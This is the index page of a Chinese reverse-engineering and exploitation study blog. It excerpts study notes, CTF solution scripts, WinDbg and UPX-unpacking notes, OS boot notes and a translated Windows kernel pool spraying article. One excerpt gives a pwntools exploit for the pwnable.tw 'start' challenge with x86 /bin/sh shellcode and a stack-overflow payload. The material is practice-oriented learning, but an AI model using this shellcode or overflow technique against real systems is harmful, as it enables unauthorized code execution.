Jimp's Blog

2021.4.21 编程语言： 油管上发现侯捷老师的C++课程https://www.youtube.com/watch?v=2S-tJaPKFdQ&list=PLARyLAkGMq_7_qm4gPZ0OvfqfQrvkFVMw&index=2，侯捷老师讲得很有大师风范，准备花点时间好好学完 Python最近开始复习了，之前学过语法，一直没用都忘记了，还是得写点东西练练手 操作系统：今天继续学习哈工大的操作系统https://www.bilibili.com/video/BV1iW411Y73K?p=7，自己边学边记笔记https://jimp.top/2021/04/21/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/，不得不说老师讲得真的好 《软件调试》挺不错的，可以边学知识边学windbg操作 2021.4.22 重新熟悉了一下IDA操作，再次感受到逆向的快乐，继续撸操作系统 2021.4.23 重新理解了一下导入表——IAT或者说IMPORT ADDRESS TABLE是位于可执行文件中用于程序运行的表格。IAT 保存用于程 ...

WelcomeTips：malloc传进的size过大会返回NULL 1234567891011121314from pwn import *p = remote('svc.pwnable.xyz', 30000)p.recvuntil('Leak: ')leak_addr = int(p.recvline(), 16)leak_addr = str(leak_addr + 0x1)print(leak_addr)p.recvuntil('message: ')p.sendline(leak_addr)p.recvuntil('message: ')p.sendline('Pwn world')flag = p.recv()print(flag)

task唯一收获：了解LLVM框架 使用llvm框架的编译task.ll成task.s文件,再使用clang编译成机器码 123llc task.llclang task.s -o task 解题脚本 123456789101112131415161718192021222324what = [0x64, 0x4E, 0x6C, 0x2E, 0x1E, 0x36, 0x38, 0x04, 0x44, 0x12, 0x1C, 0x24, 0x5C, 0x59, 0x3D, 0x0B, 0x5A, 0x78, 0x08, 0x09, 0x76, 0x70, 0x79, 0x33, 0x13, 0x16, 0x20, 0x7E, 0x6B, 0x23, 0x36, 0x45, 0x07, 0x11, 0x2C, 0x22, 0x4A, 0x4A, 0x4F, 0x2E, 0x48, 0x4C, 0x7C, 0x3E, 0x11, 0x0F, 0x6A, 0x18, 0x37, 0x42, 0x1E, 0x2B, 0x12, ...

start 123456789101112131415from pwn import *shellcode = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80'gadget = 0x08048087payload1 = b'A' * 20 + p32(gadget)p = remote('chall.pwnable.tw', 10000)p.recvuntil(':')p.send(payload1)leak_shellcode_addr = u32(p.recv(4))payload = b'A' * 20 + p32(leak_shellcode_addr + 20) + shellcodep.send(payload)p.interactive()

记录Windbg遇到的坑 坑一 IDA连接Windbg准备在IDA7.5下使用windbg调试器，但发现一直装不上，一开始使用的是x86的windbg，发现每次想使用windbg，都会提示找不到调试器，在StackOverflow上看到有人提议使用amd64的windbg，发现切换后确实可以找到调试器，但遇上了新的问题，提示信息symsrv.dll的版本过低，然后IDA7.5直接退出了，上翻下找都没找到新版本的symsrv.dll，后来发现我使用了大牛的https://bbs.pediy.com/thread-266189.htm修复dll出了点小问题，自己太菜也不知道咋解决，只好保留原始的东西，不进行修复 总结：使用amd64位的windbg即可与IDA进行连接 坑二 Windbg安装mona本机一开始只有Python3.8，配置了PYTHONPATH环境变量D:\Python38;C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\winext，在https://githomelab.ru/pykd/pykd/-/wikis ...

UPX脱壳 用到的实验文件：https://github.com/ReJimp/lab-environment/blob/master/PACKED_CRACKME.EXE 使用IDA加载的时候勾选Manual loda去加载所有区段,取消勾选Create import segment，但是这样做有时候带来的问题是保存内存镜像出现错误，所以也可以保持默认选项 可以通过 程序区段文件大小远远小于内存大小 或者 识别出来的函数特别少 或者 区段信息 或者 程序入口来判断程序加壳情况 下图中，程序的入口地址是0x409be0，而不是原始程序的0x401000 UPX0区段在文件中的大小为0，而在内存中的大小为0x8000字节；0x401000 前置的 dword_标记表示数据类型为 DWORD；“?”表示只是占用而没有任何内容。Dup 表示 0xc00 个 dword，也就是说 0x3000 字节。 寻找OEPORIGINAL ENTRY POINT(OEP)就是原始程序入口，STUB ENTRY POINT(SEP)就是上面提到的加壳后的程序入口 12345UPX1:00 ...

OS概念 操作系统是计算机硬件与应用之间的一层软件 打开电源开始计算机由五大部件组成:输入设备、输出设备、存储器、运算器、控制器 基于x86PC： (1)x86 PC刚开机时CPU处于实模式 ，实模式的寻址方式为CS:IP(CS左移4位+IP) (2)开机时，CS=0xFFFF; IP=0x0000 (3)寻址0xFFFF0(ROM BIOS映射区) (4)ROM BIOS映射区的代码用于检查RAM，键盘，显示器，软硬磁盘 (5)将磁盘0磁道0扇区读入0x7c00处 (6)设置cs=0x07c0，ip=0x0000 和保护模式对应，实模式的寻址CS:IP(CS左移4位+IP)， 和保护模式不一样! ROM BIOS 磁盘0磁道0扇区也称为引导扇区，是启动设备的第一个扇区，存放着开机 后执行的第一段我们可以控制的程序，共512字节 jmpi (jump intersegment段间跳转): cs=INITSEG, ip=go 程序解读：ds=0x07c0，es=0x9000，cx=256，si=di=0，从ds:si(0x07c0:0x0000)处复制512字节的数据 ...

原文链接 导语当你正尝试去利用一个内核池漏洞时，你将必须处理许多块和池元数据。块头部存在着不少检查，如果你想避免BSOD(蓝屏)，就必须去控制所有东西。池喷是一门使池中的分配可预见的艺术。这意味着你将知道一个块会被分配在哪里，及其周围的块。如果你想泄露一些精确的信息或者覆写特定的数据，这是必须的。本篇文章的意图不是深度阐述池的内部结构，但只有你知道基础知识才能理解池喷机制。如果你需要关于池的内部结构的详尽信息，你应该阅读Tarjei Mandt的文章。基于同样的原因，我们将只讲述x64结构。所有在本文提及的东西仅仅使用Windows内部结构并且可以应用在Windows7到Windows10的每个版本。 部分池结构这个池对于Windows内核中的每个分配来说是常见的。由于它已经被广泛使用，所以控制它比控制一个简单的堆要困难得多。它管理着所有类型的数据，从最简单的字符串到最大的结构体。即使池跟堆没有太大的不同，池也有自己的分配器和结构。Windows操作系统内核预留两个内存池，一个保留在物理内存(非分页池)，一个可以跟物理内存进行交换(分页池)。注意Windows8引入了NonPagedP ...